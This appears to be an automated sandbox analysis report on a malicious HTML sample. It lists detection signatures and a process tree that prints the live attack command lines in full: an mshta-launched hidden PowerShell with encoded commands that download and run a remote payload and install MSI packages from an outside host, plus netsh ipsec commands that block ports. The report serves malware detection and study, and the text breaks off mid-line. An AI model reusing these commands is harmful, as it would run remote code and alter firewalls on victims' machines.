Loading ...

Play interactive tourEdit tour

Analysis Report 1.htm

Overview

General Information

Sample Name:1.htm
MD5:998e6ce19986ad48b707e8850e144988
SHA1:fe9994ef57b3a1c02123d0535132ac972181c62e
SHA256:5a8caad457d4394a5655fea366963f1023deece16eb2aa0a5e8cede071cef923

Most interesting Screenshot:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Sigma detected: Dot net compiler compiles file from suspicious location
Encrypted powershell cmdline option found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • iexplore.exe (PID: 3144 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6136 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3144 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • mshta.exe (PID: 5836 cmdline: mshta vbscript:createobject('wscript.shell').run('PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA',0)(window.close) MD5: 7083239CE743FDB68DFC933B7308E80A)
        • powershell.exe (PID: 244 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 4488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAD0AIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcADcALQBaAGkAcAAiAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwAzAEQASABSAEIARgBQAEwAWgBUAEUAUQBSAFIAQgBVAEIALgBqAHAAZwAnADsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMwBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEIAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAG0AcwBpAHAAYQB0AGgAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAG0AcwBpAHAAYQB0AGgAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • csc.exe (PID: 5360 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
              • cvtres.exe (PID: 2068 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9817.tmp' 'c:\Users\user\AppData\Local\Temp\pyyender\CSC56C194C6654CA9A4EBAB4D48E4014.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
  • msiexec.exe (PID: 4036 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AF1A1FF3D2248D0BAB7E0A25E8DB57FB MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 4756 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8CF3219BCC27917BD64CC43183B26878 E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • netsh.exe (PID: 3064 cmdline: 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 install MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 4084 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianye MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 4132 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 5024 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 2400 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 1416 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 5688 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 5236 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 5408 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 4444 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 1692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 4952 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 1512 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 6080 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 1812 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200527\PowerShell_transcript.849224.EAkoss5+.20200527135524.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x14e:$sa2: -EncodedCommand
  • 0x12d:$sb3: -windowstyle hidden
  • 0x128:$sc1: -nop
  • 0x141:$se2: -exec bypass
  • 0x141:$se4: -exec bypass
C:\Users\user\Documents\20200527\PowerShell_transcript.849224.m82e68Kx.20200527135527.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x13a:$sa2: -EncodedCommand
  • 0x128:$sc1: -nop
  • 0x12d:$se2: -exec bypass
  • 0x12d:$se4: -exec bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1079073084.0000000000968000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xc14:$sa2: -EncodedCommand
  • 0xbf3:$sb3: -windowstyle hidden
  • 0xbee:$sc1: -nop
  • 0xc07:$se2: -exec bypass
  • 0xc07:$se4: -exec bypass
00000004.00000003.1076570018.0000000000962000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x2a24:$sa2: -EncodedCommand
  • 0x2ba4:$sa2: -EncodedCommand
  • 0x2d24:$sa2: -EncodedCommand
  • 0x6c14:$sa2: -EncodedCommand
  • 0x2a03:$sb3: -windowstyle hidden
  • 0x2b83:$sb3: -windowstyle hidden
  • 0x2d03:$sb3: -windowstyle hidden
  • 0x6bf3:$sb3: -windowstyle hidden
  • 0x29fe:$sc1: -nop
  • 0x2b7e:$sc1: -nop
  • 0x2cfe:$sc1: -nop
  • 0x6bee:$sc1: -nop
  • 0x2a17:$se2: -exec bypass
  • 0x2b97:$se2: -exec bypass
  • 0x2d17:$se2: -exec bypass
  • 0x6c07:$se2: -exec bypass
  • 0x2a17:$se4: -exec bypass
  • 0x2b97:$se4: -exec bypass
  • 0x2d17:$se4: -exec bypass
  • 0x6c07:$se4: -exec bypass
00000004.00000002.1080173137.0000000000F40000.00000004.00000040.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xe63:$sa2: -EncodedCommand
  • 0xe42:$sb3: -windowstyle hidden
  • 0xe3d:$sc1: -nop
  • 0xe56:$se2: -exec bypass
  • 0xe56:$se4: -exec bypass
00000004.00000002.1079147056.000000000099E000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x273:$sa2: -EncodedCommand
  • 0x4c64:$sa2: -EncodedCommand
  • 0x252:$sb3: -windowstyle hidden
  • 0x4c43:$sb3: -windowstyle hidden
  • 0x24d:$sc1: -nop
  • 0x4c3e:$sc1: -nop
  • 0x266:$se2: -exec bypass
  • 0x4c57:$se2: -exec bypass
  • 0x266:$se4: -exec bypass
  • 0x4c57:$se4: -exec bypass
00000004.00000003.1076272438.000000000098B000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x13273:$sa2: -EncodedCommand
  • 0x17c64:$sa2: -EncodedCommand
  • 0x13252:$sb3: -windowstyle hidden
  • 0x17c43:$sb3: -windowstyle hidden
  • 0x1324d:$sc1: -nop
  • 0x17c3e:$sc1: -nop
  • 0x13266:$se2: -exec bypass
  • 0x17c57:$se2: -exec bypass
  • 0x13266:$se4: -exec bypass
  • 0x17c57:$se4: -exec bypass
Click to see the 6 entries

Sigma Overview


System Summary:

barindex
Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAD0AIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcADcALQBaAGkAcAAiAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwAzAEQASABSAEIARgBQAEwAWgBUAEUAUQBSAFIAQgBVAEIALgBqAHAAZwAnADsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMwBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEIAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAG0AcwBpAHAAYQB0AGgAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAG0AcwBpAHAAYQB0AGgAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAC0AbgBhAG0AZQAgAFMAdABhAHkATwBuAFQAbwBwACkADQAKAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4488, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline', Proces
Sigma detected: MSHTA Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta vbscript:createobject('wscript.shell').run('PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA',0)(window.close), ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5836, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMwAuAGoAcABnACcAKQANAAoA, ProcessId: 244
Sigma detected: Suspicious Csc.exe Source File FolderShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pyyender\pyyender.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAD0AIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcADcALQBaAGkAcAAiAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAG0AcwBpAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwAzAEQASABSAEIARgBQAEwAWgBUAEUAUQBSAFIAQgBVAEIALgBqAHAAZwAnADsADQAKACQAbQBzAGkAcABhAHQAaABBACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMwBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEIAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAG0AcwBpAHAAYQB0AGgAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAG0AcwBpAHAAYQB0AGgAIgAsACIAIgApAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAADQAKAH0ADQAKAHUAbgB0AGkAbAAgACgARwBlAHQALQBJAHQ